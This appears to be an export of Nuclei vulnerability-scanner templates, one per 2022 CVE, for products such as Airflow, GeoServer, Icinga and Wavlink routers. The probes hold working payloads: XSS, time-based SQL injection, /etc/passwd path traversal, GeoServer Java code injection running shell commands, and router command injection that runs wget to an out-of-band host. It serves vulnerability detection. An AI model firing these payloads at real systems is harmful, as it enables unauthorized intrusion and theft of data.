0.98279\n cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: apache\n product: airflow\n shodan-query: title:\"Airflow - DAGs\" || http.html:\"Apache Airflow\"\n tags: cve,cve2022,airflow,rce,apache\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command\"\n - \"{{BaseURL}}/code?dag_id=example_passing_params_via_test_command\"\n\n stop-at-first-match: true\n matchers:\n - type: word\n words:\n - 'foo was passed in via Airflow CLI Test command with value {{ params.foo }}' # Works with unauthenticated airflow instance\n# digest: 4a0a00473045022014c9c4b7a70a69fdf977286bc7aabdd64059d785bff999619c167ab3393355120221008cdca1281271d3ca5ea873f99082667f92c1aff3d825665947813512c6113339:922c64590222798bb761d5b6d8e72950", "hash": "2b0327f75ef0b2b064321209d887775a", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084bf" }, "name": "CVE-2022-24384.yaml", "content": "id: CVE-2022-24384\n\ninfo:\n name: SmarterTools SmarterTrack - Cross-Site Scripting\n author: E1A\n severity: medium\n description: |\n Cross-site Scripting (XSS) vulnerability in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by SmarterTools to fix this vulnerability.\n reference:\n - https://csirt.divd.nl/CVE-2022-24384\n - https://csirt.divd.nl/DIVD-2021-00029\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-24384\n cwe-id: CWE-79\n epss-score: 0.00084\n epss-percentile: 0.34937\n cpe: cpe:2.3:a:smartertools:smartertrack:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: smartertools\n product: smartertrack\n shodan-query: http.favicon.hash:1410071322\n tags: cve,cve2022,xss,smartertrack,smartertools\n\nhttp:\n - raw:\n - |+\n GET /Main/Default.aspx?viewSurveyError=Unknown+survey\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n words:\n - '\"type\":\"error\",\"text\":\"Unknown survey\\\"><img src=x onerror=alert(document.domain)>\"'\n - 'smartertrack'\n condition: and\n# digest: 4a0a00473045022100b4892f5c64f6232351379b197d1871d961f0b6c1bfe2c35aa9ec6b1fe287a6f202203f5de83f46a950369d103b2ff3e6f864c4508f0b7fbbef2ffdd5ae4281720fcc:922c64590222798bb761d5b6d8e72950", "hash": "c39d1d40cfef4062deb7584c5e790a6a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084c0" }, "name": "CVE-2022-2462.yaml", "content": "id: CVE-2022-2462\n\ninfo:\n name: WordPress Transposh <=1.0.8.1 - Information Disclosure\n author: dwisiswant0\n severity: medium\n description: |\n WordPress Transposh plugin through is susceptible to information disclosure via the AJAX action tp_history, which is intended to return data about who has translated a text given by the token parameter. However, the plugin also returns the user's login name as part of the user_login attribute. If an anonymous user submits the translation, the user's IP address is returned. An attacker can leak the WordPress username of translators and potentially execute other unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the target system.\n remediation: |\n Upgrade to the latest version of the WordPress Transposh plugin (>=1.0.8.2) to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/167878/wptransposh1081-disclose.txt\n - https://github.com/oferwald/transposh\n - https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/\n - https://www.wordfence.com/vulnerability-advisories/#CVE-2022-2462\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2462\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-2462\n cwe-id: CWE-200\n epss-score: 0.02698\n epss-percentile: 0.90234\n cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: transposh\n product: transposh_wordpress_translation\n framework: wordpress\n tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm,transposh\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php\"\n\n body: \"action=tp_history&token=&lang=en\" # we leave the value for 'token' with an empty string so it fetch all history\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"len(transposh) > 0\" # 'transposh' equivalent for Transposh header key\n\n - type: word\n part: body\n words:\n # because the query is `SELECT translated, translated_by, timestamp, source, user_login [...]`\n - \"translated\"\n - \"translated_by\"\n - \"timestamp\"\n - \"source\"\n - \"user_login\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206c6ee70b9245c089a3f406d01f902c54a26c406fac6592650e59faa6311584fd022100a14c1a73652a9999f953fa755658caed5c22d516cf51b10d0c18cfc8ca40e2d1:922c64590222798bb761d5b6d8e72950", "hash": "ce8818d3ffabc84caaddb573114767e8", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084c1" }, "name": "CVE-2022-2467.yaml", "content": "id: CVE-2022-2467\n\ninfo:\n name: Garage Management System 1.0 - SQL Injection\n author: edoardottt\n severity: critical\n description: |\n Garage Management System 1.0 contains a SQL injection vulnerability in /login.php via manipulation of the argument username with input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Garage Management System 1.0.\n reference:\n - https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Garage-Management-System.md\n - https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2467\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-2467\n cwe-id: CWE-89\n epss-score: 0.01309\n epss-percentile: 0.8445\n cpe: cpe:2.3:a:garage_management_system_project:garage_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: garage_management_system_project\n product: garage_management_system\n tags: cve,cve2022,sourcecodester,garagemanagementsystem,sqli,garage_management_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n POST /login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(7)))LwLu) AND 'hsvT'='hsvT&password=412312&login=test2334\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'duration>=7'\n\n - type: word\n part: body\n words:\n - 'Garage Billing Software'\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ffddfa5138b805871ea2a646da2d928f9d7c7e4984d7b39c4337da59dc6ffee00221008bb7119b74e219c4da7ebc1abe7299068e74ab28eb036cb85ad8ccdf44bea154:922c64590222798bb761d5b6d8e72950", "hash": "027d45165103fbc1436737fbce103a8d", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084c2" }, "name": "CVE-2022-24681.yaml", "content": "id: CVE-2022-24681\n\ninfo:\n name: ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting\n author: Open-Sec\n severity: medium\n description: |\n ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens.\n impact: |\n Successful exploitation of this vulnerability could lead to the execution of arbitrary scripts or theft of sensitive information.\n remediation: |\n Upgrade to a version of ManageEngine ADSelfService Plus that is higher than 6121 to mitigate this vulnerability.\n reference:\n - https://raxis.com/blog/cve-2022-24681\n - https://www.manageengine.com/products/self-service-password/advisory/CVE-2022-24681.html\n - https://manageengine.com\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24681\n - https://www.manageengine.com/products/self-service-password/kb/CVE-2022-24681.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-24681\n cwe-id: CWE-79\n epss-score: 0.00155\n epss-percentile: 0.51848\n cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zohocorp\n product: manageengine_adselfservice_plus\n tags: cve,cve2022,manageengine,xss,authenticated,zohocorp\n\nhttp:\n - raw:\n - |\n POST /servlet/GetProductVersion HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - compare_versions(buildnumber, '< 6121')\n\n - type: word\n part: body\n words:\n - \"ManageEngine\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: buildnumber\n group: 1\n regex:\n - '\"BUILD_NUMBER\":\"([0-9]+)\",'\n internal: true\n part: body\n# digest: 4a0a00473045022100bb98caa57ec6e3ed65dcc5cfbfe03e4b587538e5e968b2097fac7c24343595bf022024df61662ad6dcdb68cd5e6cc916990b9854a8d8e027ac7f1651aee87880932c:922c64590222798bb761d5b6d8e72950", "hash": "4344dcaa4d8c83e51c609874768b9737", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084c3" }, "name": "CVE-2022-24716.yaml", "content": "id: CVE-2022-24716\n\ninfo:\n name: Icinga Web 2 - Arbitrary File Disclosure\n author: DhiyaneshDK\n severity: high\n description: |\n Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials.\n impact: |\n The vulnerability can lead to unauthorized access to sensitive information, potentially exposing credentials, configuration files, and other sensitive data.\n remediation: This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated.\n reference:\n - https://github.com/JacobEbben/CVE-2022-24716/blob/main/exploit.py\n - http://packetstormsecurity.com/files/171774/Icinga-Web-2.10-Arbitrary-File-Disclosure.html\n - https://github.com/Icinga/icingaweb2/commit/9931ed799650f5b8d5e1dc58ea3415a4cdc5773d\n - https://github.com/Icinga/icingaweb2/security/advisories/GHSA-5p3f-rh28-8frw\n - https://security.gentoo.org/glsa/202208-05\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-24716\n cwe-id: CWE-22\n epss-score: 0.25375\n epss-percentile: 0.96582\n cpe: cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: icinga\n product: icinga_web_2\n shodan-query: title:\"Icinga\"\n tags: cve,cve2022,packetstorm,icinga,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/lib/icinga/icinga-php-thirdparty/etc/passwd\"\n - \"{{BaseURL}}/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd\"\n - \"{{BaseURL}}/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - text/plain\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c9539549dcfc756f1d0a2325969b03be5a4a019f130c94dca75be9859b0aa649022100dfa8df926228c77eb9d9593dcb7e8189e5d91eb3209ecf64297b5454a6c8cf88:922c64590222798bb761d5b6d8e72950", "hash": "d1e46d59282d7c6ea83878bec1cb25f0", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084c4" }, "name": "CVE-2022-24816.yaml", "content": "id: CVE-2022-24816\n\ninfo:\n name: GeoServer <1.2.2 - Remote Code Execution\n author: mukundbhuva\n severity: critical\n description: |\n Programs run on GeoServer before 1.2.2 which use jt-jiffle and allow Jiffle script to be provided via network request are susceptible to remote code execution. The Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects downstream GeoServer 1.1.22.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.\n remediation: 1.2.22 contains a patch that disables the ability to inject malicious code into the resulting script. Users unable to upgrade may negate the ability to compile Jiffle scripts from the final application by removing janino-x.y.z.jar from the classpath.\n reference:\n - https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html\n - https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx\n - https://github.com/geosolutions-it/jai-ext/commit/cb1d6565d38954676b0a366da4f965fef38da1cb\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24816\n - https://github.com/tanjiti/sec_profile\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-24816\n cwe-id: CWE-94\n epss-score: 0.86265\n epss-percentile: 0.98506\n cpe: cpe:2.3:a:geosolutionsgroup:jai-ext:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: geosolutionsgroup\n product: jai-ext\n shodan-query: /geoserver/\n fofa-query: app=\"GeoServer\"\n tags: cve,cve2022,geoserver,rce,geosolutionsgroup\n\nhttp:\n - raw:\n - |\n POST /geoserver/wms HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <wps:Execute version=\"1.0.0\" service=\"WPS\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns=\"http://www.opengis.net/wps/1.0.0\" xmlns:wfs=\"http://www.opengis.net/wfs\" xmlns:wps=\"http://www.opengis.net/wps/1.0.0\" xmlns:ows=\"http://www.opengis.net/ows/1.1\" xmlns:gml=\"http://www.opengis.net/gml\" xmlns:ogc=\"http://www.opengis.net/ogc\" xmlns:wcs=\"http://www.opengis.net/wcs/1.1.1\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" xsi:schemaLocation=\"http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd\">\n <ows:Identifier>ras:Jiffle</ows:Identifier>\n <wps:DataInputs>\n <wps:Input>\n <ows:Identifier>coverage</ows:Identifier>\n <wps:Data>\n <wps:ComplexData mimeType=\"application/arcgrid\"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999 316]]></wps:ComplexData>\n </wps:Data>\n </wps:Input>\n <wps:Input>\n <ows:Identifier>script</ows:Identifier>\n <wps:Data>\n <wps:LiteralData>dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream())); String line = null; String allLines = \" - \"; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>\n </wps:Data>\n </wps:Input>\n <wps:Input>\n <ows:Identifier>outputType</ows:Identifier>\n <wps:Data>\n <wps:LiteralData>DOUBLE</wps:LiteralData>\n </wps:Data>\n </wps:Input>\n </wps:DataInputs>\n <wps:ResponseForm>\n <wps:RawDataOutput mimeType=\"image/tiff\">\n <ows:Identifier>result</ows:Identifier>\n </wps:RawDataOutput>\n </wps:ResponseForm>\n </wps:Execute>\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n - \"ExceptionInInitializerError\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008c43a89e6024f154e1c9ec73d2af5b54a9fe62ce9de2200c4c749d86d684bcac02206e61c587bb72efa57e89b3e5d7522186d366d6693a3fefd7dcf278d233235347:922c64590222798bb761d5b6d8e72950", "hash": "5ff42a9cdf4c57f33e03aa4d95f78c33", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084c5" }, "name": "CVE-2022-24856.yaml", "content": "id: CVE-2022-24856\n\ninfo:\n name: Flyte Console <0.52.0 - Server-Side Request Forgery\n author: pdteam\n severity: high\n description: |\n FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur.\n impact: |\n An attacker can exploit this vulnerability to perform unauthorized actions, such as accessing internal resources, bypassing security controls, or launching further attacks.\n remediation: |\n The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole.\n reference:\n - https://github.com/flyteorg/flyteconsole/security/advisories/GHSA-www6-hf2v-v9m9\n - https://github.com/flyteorg/flyteconsole/pull/389\n - https://hackerone.com/reports/1540906\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24856\n - https://github.com/flyteorg/flyteconsole/commit/05b88ed2d2ecdb5d8a8404efea25414e57189709\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-24856\n cwe-id: CWE-918\n epss-score: 0.08397\n epss-percentile: 0.94255\n cpe: cpe:2.3:a:flyte:flyte_console:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: flyte\n product: flyte_console\n tags: cve2022,cve,flyteconsole,ssrf,oss,hackerone,flyte\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cors_proxy/https://oast.me/\"\n\n matchers:\n - type: word\n words:\n - \"Interactsh Server\"\n# digest: 490a00463044022011000b62bbdc9d5f28cdb1540f0177002809856e4f065b19296986952d6abac5022034c9d32e197b3f27d3f1d38e02891c4f95987145301f02da2555758516aef94e:922c64590222798bb761d5b6d8e72950", "hash": "b351a0884a1b6c6158b729ebc54831d8", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084c6" }, "name": "CVE-2022-2486.yaml", "content": "id: CVE-2022-2486\n\ninfo:\n name: Wavlink WN535K2/WN535K3 - OS Command Injection\n author: For3stCo1d\n severity: critical\n description: |\n Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.\n remediation: |\n Apply the latest firmware update provided by the vendor to mitigate this vulnerability.\n reference:\n - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20mesh.cgi.md\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2486\n - https://vuldb.com/?id.204537\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2486\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-2486\n cwe-id: CWE-78\n epss-score: 0.97331\n epss-percentile: 0.99879\n cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wl-wn535k2_firmware\n shodan-query: http.title:\"Wi-Fi APP Login\"\n tags: cve2022,cve,iot,wavlink,router,rce,oast\n\nhttp:\n - raw:\n - |\n GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: status\n status:\n - 500\n# digest: 4b0a00483046022100b34c9aac4b9a1b672c0d52fd667187a1d74768987e33b4d41b8b694a9f5802f5022100ed27bf9f661bb4e7471c509027150bf34f2905d0b15ff35d6fcd1b08022ad4ec:922c64590222798bb761d5b6d8e72950", "hash": "c4bb54b5df6e3acf12b8b3be328e1a8b", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084c7" }, "name": "CVE-2022-2487.yaml", "content": "id: CVE-2022-2487\n\ninfo:\n name: Wavlink WN535K2/WN535K3 - OS Command Injection\n author: For3stCo1d\n severity: critical\n description: |\n Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.\n remediation: |\n Apply the latest firmware update provided by the vendor to mitigate this vulnerability.\n reference:\n - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2487\n - https://vuldb.com/?id.204538\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2487\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-2487\n cwe-id: CWE-78\n epss-score: 0.97404\n epss-percentile: 0.99916\n cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wl-wn535k2_firmware\n shodan-query: http.title:\"Wi-Fi APP Login\"\n tags: cve,cve2022,iot,wavlink,router,rce,oast\nvariables:\n cmd: \"id\"\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /cgi-bin/nightled.cgi HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n page=night_led&start_hour=;{{cmd}};\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"uid=\"\n - \"gid=\"\n - \"nightStart\"\n condition: and\n\n - type: word\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 480a00453043022063c0e55419c9314aa4179cbc620cda3fb24c5a8ec5f8a5bf570b4744cf6fd2d4021f5a44d8882c4a8b74f1f1a6a3d2651b10ecd553f39eb188a71f5c135ab2cde4:922c64590222798bb761d5b6d8e72950", "hash": "e2fbd3eb59546ef9c24a8184b34665b0", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084c8" }, "name": "CVE-2022-2488.yaml", "content": "id: CVE-2022-2488\n\ninfo:\n name: Wavlink WN535K2/WN535K3 - OS Command Injection\n author: For3stCo1d\n severity: critical\n description: |\n Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in /cgi-bin/touchlist_sync.cgi via manipulation of the argument IP. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.\n remediation: |\n Apply the latest firmware update provided by the vendor to mitigate this vulnerability.\n reference:\n - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20touchlist_sync.cgi.md\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2488\n - https://vuldb.com/?id.204539\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2488\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-2488\n cwe-id: CWE-78\n epss-score: 0.97392\n epss-percentile: 0.99908\n cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wl-wn535k2_firmware\n shodan-query: http.title:\"Wi-Fi APP Login\"\n tags: cve,cve2022,iot,wavlink,router,rce,oast\n\nhttp:\n - raw:\n - |\n GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: status\n status:\n - 500\n# digest: 4a0a004730450220356cde1b887b5746d09e420786e7774b8306e1e99f930120cb47996c24a275b2022100a3c3b2747f775e12938742f69218d9d03766d557418c26f563d6c42da95b6326:922c64590222798bb761d5b6d8e72950", "hash": "428915f8d5a641711af8dd679a2f39c1", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084c9" }, "name": "CVE-2022-24899.yaml", "content": "id: CVE-2022-24899\n\ninfo:\n name: Contao <4.13.3 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n Contao prior to 4.13.3 contains a cross-site scripting vulnerability. It is possible to inject arbitrary JavaScript code into the canonical tag.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: As a workaround, users may disable canonical tags in the root page settings.\n reference:\n - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/\n - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24899\n - https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html\n - https://github.com/contao/contao/commit/199206849a87ddd0fa5cf674eb3c58292fd8366c\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-24899\n cwe-id: CWE-79\n epss-score: 0.00342\n epss-percentile: 0.70926\n cpe: cpe:2.3:a:contao:contao:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: contao\n product: contao\n shodan-query: title:\"Contao\"\n tags: cve,cve2022,contao,xss,huntr\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"></script><script>alert(document.domain)</script>'\n - '\"Not authenticated\"'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n# digest: 4b0a00483046022100dd79aa0474a89a2ac03e8147296d8958bd8863792570ee2d226ce4ef2bb5fe47022100f21bdc20c0df7169bf401f396d4d70048dddd98be918337c91d990bd543060b1:922c64590222798bb761d5b6d8e72950", "hash": "911e4044fbdb44853cab7631c3da4f05", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ca" }, "name": "CVE-2022-24900.yaml", "content": "id: CVE-2022-24900\n\ninfo:\n name: Piano LED Visualizer 1.3 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: |\n Piano LED Visualizer 1.3 and prior are vulnerable to local file inclusion.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the local file inclusion vulnerability in the Piano LED Visualizer 1.3 application.\n reference:\n - https://github.com/onlaj/Piano-LED-Visualizer/issues/350\n - https://vuldb.com/?id.198714\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24900\n - https://github.com/onlaj/Piano-LED-Visualizer/commit/3f10602323cd8184e1c69a76b815655597bf0ee5\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 8.6\n cve-id: CVE-2022-24900\n cwe-id: CWE-668,CWE-22\n epss-score: 0.00999\n epss-percentile: 0.81936\n cpe: cpe:2.3:a:piano_led_visualizer_project:piano_led_visualizer:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: piano_led_visualizer_project\n product: piano_led_visualizer\n tags: cve2022,cve,lfi,piano,iot,oss,piano_led_visualizer_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220769f0b22c82a753d0e8d77f012b14207ab4c56507605203f5ed415c7de1fcce0022100b0dfc7497219b96863930792f0fc57dd921a58d19ee3eccdbb2cbe6364059fc6:922c64590222798bb761d5b6d8e72950", "hash": "1a936e4614bebc1b14fca5e94674ca59", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084cb" }, "name": "CVE-2022-24990.yaml", "content": "id: CVE-2022-24990\n\ninfo:\n name: TerraMaster TOS < 4.2.30 Server Information Disclosure\n author: dwisiswant0\n severity: high\n description: TerraMaster NAS devices running TOS 